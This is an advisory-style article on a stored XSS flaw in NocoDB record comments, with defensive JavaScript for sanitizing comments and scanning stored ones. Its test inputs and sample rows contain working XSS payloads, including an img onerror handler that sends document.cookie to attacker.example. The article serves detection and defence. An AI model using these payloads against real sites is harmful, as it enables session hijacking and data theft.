
CVE-2026-28397: NocoDB Stored XSS Vulnerability

CVE-2026-28397 is a stored cross-site scripting (XSS) vulnerability in NocoDB: record comments are rendered through Vue's v-html directive without sanitization, so any user who can post a comment can plant HTML and JavaScript that runs in the browser of everyone who later views the record. This article covers the technical details, affected versions, detection, and mitigation.


CVE-2026-28397 Overview

CVE-2026-28397 is a stored Cross-Site Scripting (XSS) vulnerability in NocoDB, an open-source platform for building databases as spreadsheets. The flaw exists in versions prior to 0.301.3, where comment content is rendered through Vue's v-html directive without prior sanitization. Authenticated users with comment privileges can inject arbitrary HTML and JavaScript that executes in the browser of any user viewing the affected record. The maintainers patched the issue in version 0.301.3.

Critical Impact

A stored payload runs with the same origin and privileges as the NocoDB front-end, in the session of whichever user opens the record. It can therefore issue API requests as that user (reading, modifying or sharing data within the workspace), read any token the front-end keeps in JavaScript-accessible storage, and, if an administrator views the comment, perform administrative actions. Cookie-based session theft is possible only where the session cookie lacks the HttpOnly flag; actions carried out through the victim's live session do not depend on that.

Affected Products

  • NocoDB versions prior to 0.301.3
  • Self-hosted NocoDB deployments using the vulnerable comment feature
  • Any workspace permitting untrusted users to post record comments

Discovery Timeline

  • 2026-03-02 - CVE-2026-28397 published to NVD
  • 2026-03-03 - Last updated in NVD database

Technical Details for CVE-2026-28397

Vulnerability Analysis

The vulnerability is classified as [CWE-79] Improper Neutralization of Input During Web Page Generation. NocoDB's comment subsystem accepts user-supplied content, stores it, and returns it to the front-end, where it is bound with Vue's v-html directive. v-html assigns the string directly to the element's innerHTML, so the browser parses it as markup rather than text. The escaping Vue applies by default exists only in mustache ({{ }}) and v-text bindings, which v-html deliberately bypasses.

Because NocoDB stores comments server-side and replays them to every viewer of the associated row, any malicious payload becomes persistent. The attack vector is network-based and requires user interaction in the form of a victim opening the affected record. Privileges required are limited to whatever level NocoDB grants for adding comments, which in many deployments includes standard collaborators.

The EPSS probability for this issue remains low, reflecting its dependence on authenticated access and victim interaction rather than direct exposure.

Root Cause

The root cause is the absence of HTML sanitization between comment storage and DOM rendering. The component responsible for displaying comments binds the raw stored text to v-html, bypassing Vue's default escaping. Either of two fixes would have neutralized the injected markup: render comments as plain text through v-text or mustache interpolation (losing any intended formatting), or, if formatted comments are a feature, pass the stored string through an allowlist sanitizer such as DOMPurify before it reaches v-html.
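As an added illustration (not NocoDB's code and not the actual patch), the following JavaScript shows the kind of allowlist sanitizer that should sit between stored comment text and a v-html sink. Under v-html the stored string reaches innerHTML unchanged, so sanitizeComment() is what stands between the attacker's comment and the DOM: tags outside a small allowlist are rendered as visible text rather than silently dropped, every attribute except a validated href on <a> is discarded, and only http(s) or site-relative links survive. The allowlist, the function names and the helper behaviour are choices made for this example; a production component should call a maintained library such as DOMPurify and pass its output, not the raw string, to v-html.

```javascript
// Added example: a minimal allowlist sanitizer for comment markup.
// Not NocoDB's code. Use a maintained library such as DOMPurify in production.

const ALLOWED_TAGS = new Set(['b', 'i', 'em', 'strong', 'code', 'p', 'br', 'a']);

// Escape every character that can open a tag, start an entity, or close an attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Text between tags only needs '<' and '>' neutralised; existing entities such
// as &amp; are left alone so they are not double-encoded.
function escapeText(s) {
  return s.replace(/[<>]/g, (c) => (c === '<' ? '&lt;' : '&gt;'));
}

// Allowlist of link targets: absolute http(s), site-relative paths, fragments.
// javascript:, data:, vbscript: and protocol-relative URLs never get through
// because nothing outside the allowlist is accepted.
function safeHref(raw) {
  const href = raw.trim();
  return /^(https?:\/\/|\/(?!\/)|#)/i.test(href) ? href : null;
}

function sanitizeComment(html) {
  const TAG = /^<\s*(\/?)\s*([a-z][a-z0-9]*)([^>]*)>$/i;
  const HREF = /\bhref\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
  let out = '';
  let last = 0;
  for (const m of html.matchAll(/<[^>]*>/g)) {
    out += escapeText(html.slice(last, m.index));
    last = m.index + m[0].length;
    const t = TAG.exec(m[0]);
    if (!t || !ALLOWED_TAGS.has(t[2].toLowerCase())) {
      // <script>, <img>, <svg>, <iframe>, comments, malformed tags: shown as text.
      out += escapeHtml(m[0]);
      continue;
    }
    const tag = t[2].toLowerCase();
    if (t[1]) {
      out += `</${tag}>`;
      continue;
    }
    // All attributes are dropped; only a validated href on <a> is rebuilt.
    let attrs = '';
    if (tag === 'a') {
      const h = HREF.exec(t[3]);
      const href = h ? safeHref(h[1] ?? h[2] ?? h[3]) : null;
      if (href) attrs = ` href="${escapeHtml(href)}" rel="noopener noreferrer"`;
    }
    out += `<${tag}${attrs}>`;
  }
  return out + escapeText(html.slice(last));
}

// Constructed payloads of the kind described above, run through the sanitizer.
const EXAMPLES = [
  '<b>Looks good</b> <img src=x onerror=alert(document.cookie)>',
  '<a href="javascript:alert(1)" onclick="steal()">report</a>',
  '<svg/onload=alert(1)>',
  '<A HREF="https://example.com/x">ok</A>',
];
for (const e of EXAMPLES) console.log(JSON.stringify(sanitizeComment(e)));
```

Escaping unknown tags rather than dropping them keeps the attacker's input visible for later review and avoids surprises where a dropped tag would have changed how the following text parses. In a Vue template the corresponding change is replacing v-html="comment.body" with v-html="sanitizeComment(comment.body)", or with v-text where formatting is not needed.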

Attack Vector

An attacker with comment permissions submits a comment containing HTML whose attributes carry JavaScript: for example an <img> whose onerror handler fires because its src cannot load, an <svg onload=…>, or an <a href="javascript:…"> link. Plain <script> tags are the wrong tool here: markup assigned through innerHTML, which is what v-html does, does not execute <script> elements, so working payloads rely on event handlers or javascript: URLs. When another authenticated user opens the record, the comment is parsed as markup and the handler runs under that user's session. From there the payload can call NocoDB's REST API with the victim's credentials, read any token the front-end keeps in JavaScript-accessible storage, or, if the victim is a workspace administrator, perform administrative actions in the attacker's interest.

No verified public proof-of-concept code is available. Refer to the GitHub Security Advisory GHSA-rcph-x7mj-54mm for technical details published by the maintainers.

Detection Methods for CVE-2026-28397

Indicators of Compromise

  • Comment records in the NocoDB database containing <script, <img onerror=, <svg onload=, javascript: URLs, or other HTML event-handler attributes. A <script tag is worth flagging as evidence of probing even though markup inserted through v-html does not execute it; the event-handler and javascript: forms are the ones that fire.
  • Outbound HTTP requests from user browsers to unknown domains immediately after loading a record view, which is how a payload would exfiltrate cookies, tokens or record data.
  • NocoDB API calls made from a legitimate user's session right after a record view that the user would not normally make, for example requests to token, user-management or sharing endpoints.

Detection Strategies

  • Query the comment storage for entries matching common XSS substrings, case-insensitively and allowing whitespace around the equals sign: <script, onerror=, onload=, javascript:, <iframe and <svg. Decode HTML entities before matching; browsers entity-decode attribute values, so &#106;avascript: in an href still executes.
  • Review web server and reverse proxy access logs for POST and PATCH requests to comment endpoints whose bodies (or their URL-encoded forms, such as %3C for <) contain HTML tags. This only works where request bodies are logged; most default proxy logs record only the request line.
  • If a Content Security Policy with a report-uri or report-to directive is deployed, inspect the violation reports for blocked inline scripts or inline event handlers on NocoDB pages; without a reporting directive there is nothing to inspect.
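The first strategy above, as an added example that is not a NocoDB tool: a small JavaScript triage scanner that runs the listed patterns over stored comment text, decoding HTML entities first so that an entity-encoded javascript: URL is not missed. The rows are constructed for the example; the real comment table and column names depend on the NocoDB metadata database in use and are not assumed here, so export the text and feed it to scanRows() rather than wiring this to a live schema.

```javascript
// Added example: triage scan of stored comment text for XSS payloads.
// Not NocoDB code. Rows are constructed here; in practice export them from the
// comment table of your NocoDB metadata database (table and column names are
// deployment-specific; check the schema rather than trusting this sample).

const XSS_PATTERNS = [
  ['script-tag',    /<\s*script\b/i],          // will not fire via v-html, but flags probing
  ['iframe-tag',    /<\s*iframe\b/i],
  ['svg-tag',       /<\s*svg\b/i],
  ['event-handler', /<[^>]*\bon[a-z]+\s*=/i],   // onerror=, onload=, onmouseover= inside a tag
  ['js-url',        /javascript\s*:/i],
];

// Browsers decode entities inside attribute values, so an attacker can write
// href="&#106;avascript:..." to slip past a plain substring search. Decode the
// decimal, hex and common named forms before matching.
function decodeEntities(s) {
  const named = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (whole, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const code = parseInt(hex ? body.slice(2) : body.slice(1), hex ? 16 : 10);
      return Number.isFinite(code) && code <= 0x10ffff ? String.fromCodePoint(code) : whole;
    }
    return named[body.toLowerCase()] ?? whole;
  });
}

// Returns the names of every pattern that matches the (decoded) comment body.
function scanComment(body) {
  const decoded = decodeEntities(body);
  return XSS_PATTERNS.filter(([, re]) => re.test(decoded)).map(([name]) => name);
}

// Keeps only rows with at least one hit, preserving id and author for follow-up.
function scanRows(rows) {
  return rows.flatMap(({ id, author, body }) => {
    const hits = scanComment(body);
    return hits.length ? [{ id, author, hits }] : [];
  });
}

// Constructed sample: two benign comments and three payloads, one entity-encoded.
const SAMPLE_ROWS = [
  { id: 1, author: 'alice',   body: 'Please move the deadline to 2026-03-15.' },
  { id: 2, author: 'bob',     body: 'Logged on the server, see <code>/var/log/app.log</code>; status online=true' },
  { id: 3, author: 'mallory', body: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' },
  { id: 4, author: 'mallory', body: '<a href="&#106;avascript:alert(document.domain)">open report</a>' },
  { id: 5, author: 'mallory', body: '<iframe src="JaVaScRiPt:alert(1)"></iframe>' },
];

for (const hit of scanRows(SAMPLE_ROWS)) console.log(JSON.stringify(hit));
```

Run the scan over an export of the comment text rather than against the live database, and open each hit by hand: the patterns are deliberately broad, and a hit proves only that markup is present, not that it executed in anyone's browser. The event-handler pattern is anchored inside a tag so that ordinary prose such as "online=true" does not trip it.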

Monitoring Recommendations

  • Enable verbose audit logging on comment creation and modification events in NocoDB.
  • Forward NocoDB application logs to a centralized SIEM and alert on comment payloads matching XSS signatures.
  • Monitor for anomalous session activity such as administrator API calls originating shortly after a user views a shared record.

How to Mitigate CVE-2026-28397

Immediate Actions Required

  • Upgrade NocoDB to version 0.301.3 or later without delay.
  • Audit existing comments for malicious HTML and remove or neutralize any payloads found.
  • If malicious comments are found, rotate session tokens and API keys for users who may have viewed the affected records, since the payload ran inside their sessions.

Patch Information

The maintainers fixed the issue in the NocoDB 0.301.3 release. The patch removes the unsanitized v-html binding and routes comment content through a sanitization step before rendering. Full advisory details are available in GitHub Security Advisory GHSA-rcph-x7mj-54mm.

Workarounds

  • Restrict comment privileges to trusted users only until the upgrade is applied; this removes the injection point but not any payloads already stored.
  • Deploy a Content Security Policy that disallows inline scripts and inline event handlers on the NocoDB origin. Roll it out in Content-Security-Policy-Report-Only mode first, because the NocoDB front-end may itself rely on inline scripts or eval-like constructs that a strict policy would break.
  • Place NocoDB behind a Web Application Firewall that inspects comment POST bodies for HTML and JavaScript patterns. Treat this as a stop-gap: signature matching on HTML is routinely bypassed (case changes, entity encoding, unusual handlers), so it reduces but does not eliminate exposure.
```bash
# Upgrade a Docker-based NocoDB deployment to the patched release.
# Back up the data volume (and any external database) before replacing the container.
docker pull nocodb/nocodb:0.301.3
docker stop nocodb && docker rm nocodb
docker run -d --name nocodb \
  -p 8080:8080 \
  -v nocodb_data:/usr/app/data \
  nocodb/nocodb:0.301.3
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
